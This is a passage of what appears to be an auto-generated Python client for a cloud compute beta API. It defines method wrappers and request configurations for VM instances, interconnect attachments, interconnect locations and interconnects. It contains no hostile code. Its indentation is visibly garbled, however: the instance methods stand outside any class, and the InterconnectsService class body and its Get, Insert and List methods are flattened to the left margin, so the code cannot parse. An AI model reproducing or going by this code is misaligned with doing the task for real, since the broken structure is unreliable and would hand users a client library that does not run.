    request_field=u'instance',
    request_type_name=u'ComputeInstancesInsertRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def List(self, request, global_params=None):
  """Retrieves the list of instances contained within the specified zone.

  Args:
    request: (ComputeInstancesListRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (InstanceList) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('List'), request, global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
List.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'GET',
    method_id=u'compute.instances.list',
    ordered_params=[u'project', u'zone'],
    path_params=[u'project', u'zone'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    relative_path=u'projects/{project}/zones/{zone}/instances',
    request_field='',
    request_type_name=u'ComputeInstancesListRequest',
    response_type_name=u'InstanceList',
    supports_download=False,
)
def ListReferrers(self, request, global_params=None):
  """Retrieves the list of referrers to instances contained within the specified zone.

  Args:
    request: (ComputeInstancesListReferrersRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (InstanceListReferrers) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('ListReferrers'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
ListReferrers.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'GET',
    method_id=u'compute.instances.listReferrers',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/referrers',
    request_field='',
    request_type_name=u'ComputeInstancesListReferrersRequest',
    response_type_name=u'InstanceListReferrers',
    supports_download=False,
)
def Reset(self, request, global_params=None):
  """Performs a reset on the instance. For more information, see Resetting an instance.

  Args:
    request: (ComputeInstancesResetRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('Reset'), request, global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
Reset.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.reset',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/reset',
    request_field='',
    request_type_name=u'ComputeInstancesResetRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetDeletionProtection(self, request, global_params=None):
  """Sets deletion protection on the instance.

  Args:
    request: (ComputeInstancesSetDeletionProtectionRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('SetDeletionProtection'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
SetDeletionProtection.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setDeletionProtection',
    ordered_params=[u'project', u'zone', u'resource'],
    path_params=[u'project', u'resource', u'zone'],
    query_params=[u'deletionProtection', u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{resource}/setDeletionProtection',
    request_field='',
    request_type_name=u'ComputeInstancesSetDeletionProtectionRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetDiskAutoDelete(self, request, global_params=None):
  """Sets the auto-delete flag for a disk attached to an instance.

  Args:
    request: (ComputeInstancesSetDiskAutoDeleteRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('SetDiskAutoDelete'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
SetDiskAutoDelete.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setDiskAutoDelete',
    ordered_params=[u'project', u'zone', u'instance', u'autoDelete', u'deviceName'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'autoDelete', u'deviceName', u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setDiskAutoDelete',
    request_field='',
    request_type_name=u'ComputeInstancesSetDiskAutoDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetLabels(self, request, global_params=None):
  """Sets labels on an instance. To learn more about labels, read the Labeling Resources documentation.

  Args:
    request: (ComputeInstancesSetLabelsRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('SetLabels'), request, global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setLabels',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setLabels',
    request_field=u'instancesSetLabelsRequest',
    request_type_name=u'ComputeInstancesSetLabelsRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetMachineResources(self, request, global_params=None):
  """Changes the number and/or type of accelerator for a stopped instance to the values specified in the request.

  Args:
    request: (ComputeInstancesSetMachineResourcesRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('SetMachineResources'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
SetMachineResources.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setMachineResources',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMachineResources',
    request_field=u'instancesSetMachineResourcesRequest',
    request_type_name=u'ComputeInstancesSetMachineResourcesRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetMachineType(self, request, global_params=None):
  """Changes the machine type for a stopped instance to the machine type specified in the request.

  Args:
    request: (ComputeInstancesSetMachineTypeRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('SetMachineType'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
SetMachineType.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setMachineType',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMachineType',
    request_field=u'instancesSetMachineTypeRequest',
    request_type_name=u'ComputeInstancesSetMachineTypeRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetMetadata(self, request, global_params=None):
  """Sets metadata for the specified instance to the data included in the request.

  Args:
    request: (ComputeInstancesSetMetadataRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('SetMetadata'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
SetMetadata.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setMetadata',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMetadata',
    request_field=u'metadata',
    request_type_name=u'ComputeInstancesSetMetadataRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetMinCpuPlatform(self, request, global_params=None):
  """Changes the minimum CPU platform that this instance should use. This method can only be called on a stopped instance. For more information, read Specifying a Minimum CPU Platform.

  Args:
    request: (ComputeInstancesSetMinCpuPlatformRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('SetMinCpuPlatform'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
SetMinCpuPlatform.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setMinCpuPlatform',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMinCpuPlatform',
    request_field=u'instancesSetMinCpuPlatformRequest',
    request_type_name=u'ComputeInstancesSetMinCpuPlatformRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetScheduling(self, request, global_params=None):
  """Sets an instance's scheduling options.

  Args:
    request: (ComputeInstancesSetSchedulingRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('SetScheduling'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
SetScheduling.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setScheduling',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setScheduling',
    request_field=u'scheduling',
    request_type_name=u'ComputeInstancesSetSchedulingRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetServiceAccount(self, request, global_params=None):
  """Sets the service account on the instance. For more information, read Changing the service account and access scopes for an instance.

  Args:
    request: (ComputeInstancesSetServiceAccountRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('SetServiceAccount'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
SetServiceAccount.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setServiceAccount',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setServiceAccount',
    request_field=u'instancesSetServiceAccountRequest',
    request_type_name=u'ComputeInstancesSetServiceAccountRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SetTags(self, request, global_params=None):
  """Sets tags for the specified instance to the data included in the request.

  Args:
    request: (ComputeInstancesSetTagsRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('SetTags'), request, global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
SetTags.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.setTags',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setTags',
    request_field=u'tags',
    request_type_name=u'ComputeInstancesSetTagsRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def SimulateMaintenanceEvent(self, request, global_params=None):
  """Simulates a maintenance event on the instance.

  Args:
    request: (ComputeInstancesSimulateMaintenanceEventRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('SimulateMaintenanceEvent'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
SimulateMaintenanceEvent.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.simulateMaintenanceEvent',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/simulateMaintenanceEvent',
    request_field='',
    request_type_name=u'ComputeInstancesSimulateMaintenanceEventRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Start(self, request, global_params=None):
  """Starts an instance that was stopped using the instances().stop method. For more information, see Restart an instance.

  Args:
    request: (ComputeInstancesStartRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('Start'), request, global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
Start.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.start',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/start',
    request_field='',
    request_type_name=u'ComputeInstancesStartRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def StartWithEncryptionKey(self, request, global_params=None):
  """Starts an instance that was stopped using the instances().stop method. For more information, see Restart an instance.

  Args:
    request: (ComputeInstancesStartWithEncryptionKeyRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('StartWithEncryptionKey'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
StartWithEncryptionKey.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.startWithEncryptionKey',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/startWithEncryptionKey',
    request_field=u'instancesStartWithEncryptionKeyRequest',
    request_type_name=u'ComputeInstancesStartWithEncryptionKeyRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Stop(self, request, global_params=None):
  """Stops a running instance, shutting it down cleanly, and allows you to restart the instance at a later time. Stopped instances do not incur VM usage charges while they are stopped. However, resources that the VM is using, such as persistent disks and static IP addresses, will continue to be charged until they are deleted. For more information, see Stopping an instance.

  Args:
    request: (ComputeInstancesStopRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('Stop'), request, global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
Stop.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.stop',
    ordered_params=[u'project', u'zone', u'instance'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/stop',
    request_field='',
    request_type_name=u'ComputeInstancesStopRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
  """Returns permissions that a caller has on the specified resource.

  Args:
    request: (ComputeInstancesTestIamPermissionsRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (TestPermissionsResponse) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('TestIamPermissions'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.testIamPermissions',
    ordered_params=[u'project', u'zone', u'resource'],
    path_params=[u'project', u'resource', u'zone'],
    query_params=[],
    relative_path=u'projects/{project}/zones/{zone}/instances/{resource}/testIamPermissions',
    request_field=u'testPermissionsRequest',
    request_type_name=u'ComputeInstancesTestIamPermissionsRequest',
    response_type_name=u'TestPermissionsResponse',
    supports_download=False,
)
def UpdateAccessConfig(self, request, global_params=None):
  """Updates the specified access config from an instance's network interface with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.

  Args:
    request: (ComputeInstancesUpdateAccessConfigRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('UpdateAccessConfig'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
UpdateAccessConfig.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'POST',
    method_id=u'compute.instances.updateAccessConfig',
    ordered_params=[u'project', u'zone', u'instance', u'networkInterface'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'networkInterface', u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/updateAccessConfig',
    request_field=u'accessConfig',
    request_type_name=u'ComputeInstancesUpdateAccessConfigRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def UpdateNetworkInterface(self, request, global_params=None):
  """Updates an instance's network interface. This method follows PATCH semantics.

  Args:
    request: (ComputeInstancesUpdateNetworkInterfaceRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('UpdateNetworkInterface'), request,
      global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
UpdateNetworkInterface.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'PATCH',
    method_id=u'compute.instances.updateNetworkInterface',
    ordered_params=[u'project', u'zone', u'instance', u'networkInterface'],
    path_params=[u'instance', u'project', u'zone'],
    query_params=[u'networkInterface', u'requestId'],
    relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/updateNetworkInterface',
    request_field=u'networkInterfaceResource',
    request_type_name=u'ComputeInstancesUpdateNetworkInterfaceRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
class InterconnectAttachmentsService(base_api.BaseApiService):
  """Service class for the interconnectAttachments resource."""

  _NAME = u'interconnectAttachments'

  def __init__(self, client):
    super(ComputeBeta.InterconnectAttachmentsService, self).__init__(client)
    # No media-upload methods on this resource.
    self._upload_configs = {}

  def AggregatedList(self, request, global_params=None):
    """Retrieves an aggregated list of interconnect attachments.

    Args:
      request: (ComputeInterconnectAttachmentsAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InterconnectAttachmentAggregatedList) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('AggregatedList'), request,
        global_params=global_params)

  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.interconnectAttachments.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/interconnectAttachments',
      request_field='',
      request_type_name=u'ComputeInterconnectAttachmentsAggregatedListRequest',
      response_type_name=u'InterconnectAttachmentAggregatedList',
      supports_download=False,
  )

  def Delete(self, request, global_params=None):
    """Deletes the specified interconnect attachment.

    Args:
      request: (ComputeInterconnectAttachmentsDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Delete'), request, global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.interconnectAttachments.delete',
      ordered_params=[u'project', u'region', u'interconnectAttachment'],
      path_params=[u'interconnectAttachment', u'project', u'region'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/interconnectAttachments/{interconnectAttachment}',
      request_field='',
      request_type_name=u'ComputeInterconnectAttachmentsDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified interconnect attachment.

    Args:
      request: (ComputeInterconnectAttachmentsGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InterconnectAttachment) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Get'), request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.interconnectAttachments.get',
      ordered_params=[u'project', u'region', u'interconnectAttachment'],
      path_params=[u'interconnectAttachment', u'project', u'region'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/interconnectAttachments/{interconnectAttachment}',
      request_field='',
      request_type_name=u'ComputeInterconnectAttachmentsGetRequest',
      response_type_name=u'InterconnectAttachment',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates an InterconnectAttachment in the specified project using the data included in the request.

    Args:
      request: (ComputeInterconnectAttachmentsInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Insert'), request, global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.interconnectAttachments.insert',
      ordered_params=[u'project', u'region'],
      path_params=[u'project', u'region'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/interconnectAttachments',
      request_field=u'interconnectAttachment',
      request_type_name=u'ComputeInterconnectAttachmentsInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of interconnect attachments contained within the specified region.

    Args:
      request: (ComputeInterconnectAttachmentsListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InterconnectAttachmentList) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('List'), request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.interconnectAttachments.list',
      ordered_params=[u'project', u'region'],
      path_params=[u'project', u'region'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/regions/{region}/interconnectAttachments',
      request_field='',
      request_type_name=u'ComputeInterconnectAttachmentsListRequest',
      response_type_name=u'InterconnectAttachmentList',
      supports_download=False,
  )

  def Patch(self, request, global_params=None):
    """Updates the specified interconnect attachment with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.

    Args:
      request: (ComputeInterconnectAttachmentsPatchRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Patch'), request, global_params=global_params)

  Patch.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'PATCH',
      method_id=u'compute.interconnectAttachments.patch',
      ordered_params=[u'project', u'region', u'interconnectAttachment'],
      path_params=[u'interconnectAttachment', u'project', u'region'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/interconnectAttachments/{interconnectAttachment}',
      request_field=u'interconnectAttachmentResource',
      request_type_name=u'ComputeInterconnectAttachmentsPatchRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetLabels(self, request, global_params=None):
    """Sets the labels on an InterconnectAttachment. To learn more about labels, read the Labeling Resources documentation.

    Args:
      request: (ComputeInterconnectAttachmentsSetLabelsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('SetLabels'), request,
        global_params=global_params)

  SetLabels.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.interconnectAttachments.setLabels',
      ordered_params=[u'project', u'region', u'resource'],
      path_params=[u'project', u'region', u'resource'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/interconnectAttachments/{resource}/setLabels',
      request_field=u'regionSetLabelsRequest',
      request_type_name=u'ComputeInterconnectAttachmentsSetLabelsRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeInterconnectAttachmentsTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (TestPermissionsResponse) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('TestIamPermissions'), request,
        global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.interconnectAttachments.testIamPermissions',
      ordered_params=[u'project', u'region', u'resource'],
      path_params=[u'project', u'region', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/interconnectAttachments/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeInterconnectAttachmentsTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class InterconnectLocationsService(base_api.BaseApiService):
  """Service class for the interconnectLocations resource."""

  _NAME = u'interconnectLocations'

  def __init__(self, client):
    super(ComputeBeta.InterconnectLocationsService, self).__init__(client)
    # No media-upload methods on this resource.
    self._upload_configs = {}

  def Get(self, request, global_params=None):
    """Returns the details for the specified interconnect location. Get a list of available interconnect locations by making a list() request.

    Args:
      request: (ComputeInterconnectLocationsGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InterconnectLocation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Get'), request, global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.interconnectLocations.get',
      ordered_params=[u'project', u'interconnectLocation'],
      path_params=[u'interconnectLocation', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/interconnectLocations/{interconnectLocation}',
      request_field='',
      request_type_name=u'ComputeInterconnectLocationsGetRequest',
      response_type_name=u'InterconnectLocation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of interconnect locations available to the specified project.

    Args:
      request: (ComputeInterconnectLocationsListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments

    Returns:
      (InterconnectLocationList) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('List'), request, global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.interconnectLocations.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/interconnectLocations',
      request_field='',
      request_type_name=u'ComputeInterconnectLocationsListRequest',
      response_type_name=u'InterconnectLocationList',
      supports_download=False,
  )
class InterconnectsService(base_api.BaseApiService):
"""Service class for the interconnects resource."""
_NAME = u'interconnects'
def __init__(self, client):
  """Bind this service to its API client; the resource has no upload methods."""
  super(ComputeBeta.InterconnectsService, self).__init__(client)
  self._upload_configs = {}
def Delete(self, request, global_params=None):
  """Deletes the specified interconnect.

  Args:
    request: (ComputeInterconnectsDeleteRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments

  Returns:
    (Operation) The response message.
  """
  # Resolve the declarative config and delegate the round trip to the shared runner.
  return self._RunMethod(
      self.GetMethodConfig('Delete'), request, global_params=global_params)

# Transport metadata consumed lazily by base_api when the method is invoked.
Delete.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'DELETE',
    method_id=u'compute.interconnects.delete',
    ordered_params=[u'project', u'interconnect'],
    path_params=[u'interconnect', u'project'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/global/interconnects/{interconnect}',
    request_field='',
    request_type_name=u'ComputeInterconnectsDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified interconnect. Get a list of available interconnects by making a list() request.
Args:
request: (ComputeInterconnectsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Interconnect) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.interconnects.get',
ordered_params=[u'project', u'interconnect'],
path_params=[u'interconnect', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/interconnects/{interconnect}',
request_field='',
request_type_name=u'ComputeInterconnectsGetRequest',
response_type_name=u'Interconnect',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a Interconnect in the specified project using the data included in the request.
Args:
request: (ComputeInterconnectsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.interconnects.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/interconnects',
request_field=u'interconnect',
request_type_name=u'ComputeInterconnectsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of interconnect available to the specified project.
Args:
request: (ComputeInterconnectsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InterconnectList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
